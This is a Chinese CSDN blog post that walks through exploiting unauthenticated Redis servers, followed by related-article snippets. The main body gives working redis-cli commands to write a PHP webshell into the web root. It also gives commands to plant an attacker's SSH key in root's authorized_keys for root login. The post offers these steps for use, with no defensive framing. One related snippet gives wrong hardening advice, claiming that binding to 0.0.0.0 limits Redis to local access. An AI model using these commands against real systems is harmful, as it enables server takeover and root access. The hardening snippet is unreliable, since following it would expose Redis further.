Redis未授权如何访问漏洞?

最新推荐文章于 2022-04-02 16:22:26 发布
最新推荐文章于 2022-04-02 16:22:26 发布
阅读量91 收藏
点赞数
分类专栏: 网络安全 内网渗透 科技公开课程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L18296069161/article/details/104014913
版权

1、利用redis写webshell
在redis-cli中写入以下命令:
config set dir /var/www/html/

config set dbfilename redis.php

set webshell “<?php phpinfo(); ?>”

save
在这里插入图片描述
然后看一下目录下是否生成了一个redis.php的文件
在这里插入图片描述

可以看到生成了,查看一下文件的内容
在这里插入图片描述
在浏览器中访问一下这个文件,成功解析,内容改成一句话木马,即可getshell
在这里插入图片描述

2、Redis 未授权访问配合 SSH key 文件利用
首先在攻击机生成密匙:ssh-keygen –t rsa
在这里插入图片描述

看到生成的文件被保存在了上图的路径中,cd /root/.ssh/,并cat查看文件内容
在这里插入图片描述

然后将公钥写入key.txt中
(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > key.txt
在这里插入图片描述

然后连接redis进行写入
$ cat key.txt | redis-cli -h 192.168.136.133 -x set crackit
$ redis-cli -h 192.168.1.11
$ 192.168.136.133:6379> config set dir /root/.ssh/
$ 192.168.1.11:6379> config set dbfilename “authorized_keys”
$ 192.168.1.11:6379> save
在这里插入图片描述

然后去目标机看一下是否生成
在这里插入图片描述

然后回到攻击机,利用自己的密钥进行ssh登录:
ssh –i id_rsa root@192.168.136.133
在这里插入图片描述

更多资料联系发布者:2646692244!

L18296069161
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问漏洞的利用
L18296069161的博客
01-15 144
1、利用redis写webshell 在redis-cli中写入以下命令: config set dir /var/www/html/ config set dbfilename redis.php set webshell “<?php phpinfo(); ?>” save 然后看一下目录下是否生成了一个redis.php的文件 可以看到生成了,查看一下文件的内容 在...
Redis授权漏洞环境搭建复现问题解决
身高两米不到的博客
03-17 636
一:搭建环境卸载重装几次,翻看几十篇文章最后复现成功,因此记录一下 环境VMware,两台主机使用NAT模式连接 Kali 192.168.209.129 CentOS7 192.168.209.128 二:CentOS搭建redis,以root权限开启虚机 (1).下载安装包 wget http://download.redis.io/releases/redis-4.0.6.tar.gz 解压 tar -zxvf redis-4.0.6.tar.gz (2).red
Redis漏洞【总结】授权访问复现与利用
qq_45300786的博客
04-20 1268
【Linux】安装httpd+php 一、安装redis服务 kali:192.168.100.23 靶机(centos):192.168.100.20 靶机(centos)安装redis服务 wget http://download.redis.io/releases/redis-2.8.17.tar.gz (如果下载不下来的话:http://distfiles.macports.org/redis/) 解压安装包:tar xzf redis-2.8.17.tar.gz 进入redis目录:cd r
redis授权
weixin_47224111的博客
10-16 2762
0X01redis介绍 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set()、zset(sorted set –有序)和hash(哈希类型)。 redis很大程度补偿了memcached这类key/value存储的不足,在部分场合可以对关系数据库起到很好的补充作用。它提供了Java,C/C++,C#,PHP,JavaScript,Perl,Object-C,Python,Ruby,Erlang等客户
【Vulfocus漏洞复现】redis-cnvd_2019_21763、redis-cnvd_2015_07557
weixin_45632448的博客
04-02 3696
vps:腾讯云 centos8 本地:windows11 靶场环境:http://123.58.236.76:47109/ 在vps上执行以下命令 git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand cd RedisModules-ExecuteCommand/ make 编译之后继续执行命令 git clone https://github.com/Ridter/redis-rce.git cd redis-rce/
Redis授权访问配合SSH key文件利用详解
09-09
主要给大家介绍了关于Redis授权访问配合SSH key文件利用的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
授权漏洞总结
weixin_45682070的博客
11-06 1119
前言 今年5月,比特币勒索病毒 WannaCry 席卷全球,国内众多机构部门计算机系统瘫痪。根据之前应急响应的案例分析,以及一些安全报告统计,目前大部分的勒索病毒均利用授权访问等通用漏洞进行植入、勒索,尤其是 Redis、MongoDB 等数据库的授权访问漏洞尤其严重。参见《【脉搏译文系列】如何高效的应对勒索软件》 0x01 介绍 授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。 目前主要存在授权.
Linux系统CentOS 7修改httpd服务Apache网站根目录/var/www/html
热门推荐
雨打芭蕉的博客
04-01 4万+
本文基于阿里云服务器CentOS7.4 讲述,如果文中有错误或者不足,敬请在评论区指出昨天我写了一篇博客讲述CentOS 7安装部署httpd服务,在安装部署好httpd服务后,访问公网IP可以正常访问,默认Apache网站根目录/var/www/html,如果我们要修改为自定义的目录路径怎么办呢?1、执行vim /etc/httpd/conf/httpd.conf指令键盘输入E,进人可编辑模式2...
利用redis写webshell
L18296069161的博客
12-26 1443
redis-cli中写入以下命令: config set dir /var/www/html/ config set dbfilename redis.php set webshell “<?php phpinfo(); ?>” save 然后看一下目录下是否生成了一个redis.php的文件 可以看到生成了,查看一下文件的内容 在浏览器中访问一下这个文件,成功解析,内容改成一...
Discuz-3.1 ssrf漏洞利用操作
L18296069161的博客
12-31 891
773617250渗透学习交流群,群内定期发布课程直播内容、时间及地址,欢迎大家进群学习!感谢大家的支持! #001 环境搭建:  Phpstudy+win7搭建discuz漏洞环境  把Discuz-3.1 源码拖到网站根目录,然后访问upload目录进行安装,根据提示即可  安装完成访问一波: #002 漏洞复现:  Centos7,临时关闭防火墙  开启nc监听6666端口:n...
ssrf漏洞利用操作
L18296069161的博客
02-08 672
#001 环境搭建: Phpstudy+win7搭建discuz漏洞环境 把Discuz-3.1 源码拖到网站根目录,然后访问upload目录进行安装,根据提示即可 安装完成访问一波: #002 漏洞复现: Centos7,临时关闭防火墙 开启nc监听6666端口:nc -lvp 6666 查看centos7的ip 利用discuz的漏洞向centos7发起一个请求: htt...
Apache Solr远程代码执行漏洞 (CVE-2019-0193)复现操作
L18296069161的博客
01-07 645
一.漏洞描述 2019年11月16日,Apache官方发布Apache Solr远程代码执行漏洞(CVE-2019-0193)安全通告,此漏洞存在于可选模块DataImportHandler 中,DataImportHandler是用于从数据库或其他源提取数据的常用模块,该模块中所有DIH配置都可以通过外部请求的dataConfig参 数来设置,由于DIH配置可以包含脚本,因此该参数存在安全隐患。...
防止SQL注入的五种方法!!!!!!!
L18296069161的博客
02-22 607
一、SQL注入简介 SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库。 二、SQL注入攻击的总体思路 1.寻找到SQL注入的位置 2.判断服务器类型和后台数据库类型 3.针对不通的服务器和数据库特点进行SQL注入攻击 三、SQL注入攻击实例 比如在一个登录界面,要求输入用户名和密码: 可以这样输...
渗透常用工具
L18296069161的博客
02-14 504
.Burpsuite jdk 链接:httpspan.baidu.coms14ht8tItbK14q5A-jH6QKWw 提取码:i2yg
redis授权访问漏洞修复
最新发布
11-03
为修复Redis授权访问漏洞,可以采取以下措施: ``` 代码块1: 1. 修改redis.conf配置文件,将bind 127.0.0.1改为bind 0.0.0.0,这样Redis只会监听本机的IP地址,而不是所有的IP地址。 2. 设置Redis密码,可以在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值